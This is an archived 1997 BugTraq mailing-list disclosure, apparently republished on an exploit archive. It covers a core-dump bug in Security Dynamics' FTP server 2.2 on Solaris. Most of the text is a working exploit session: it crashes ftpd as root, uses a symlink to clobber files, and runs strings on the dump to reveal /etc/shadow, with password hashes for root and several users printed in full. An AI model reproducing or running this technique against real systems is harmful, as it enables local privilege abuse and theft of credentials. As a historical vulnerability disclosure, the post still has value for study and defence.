Core bug in the Security Dynamics ftp server
Description: | typical core file bug |
Author: | sp00n <sp00n@COUPLER.300BAUD.COM> |
Compromise: | root (local) |
Vulnerable Systems: | Those running the Security Dynamics FTP server (Version 2.2). This is available at least for solaris boxes. |
Date: | 12 November 1997 |
Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Bug In Security Dynamics' FTP server (Version 2.2)
Hi,
This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(
Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
Date: Wed, 12 Nov 1997 16:20:11 -0500
From: sp00n
To: BUGTRAQ@NETSPACE.ORG
Subject: correction to: Bug In Security Dynamics' FTP server (Version 2.2)
Hi,
Earlier I said:
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(
----------------earlier---------
I can read it
$id
uid=779(joeuser) gid=1500(network)
It dumps as root and the GID of the user SO I CAN do a
"strings core | more" w/o having to link it to ps_data or some root owned
file with a o+r perms
Matt
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: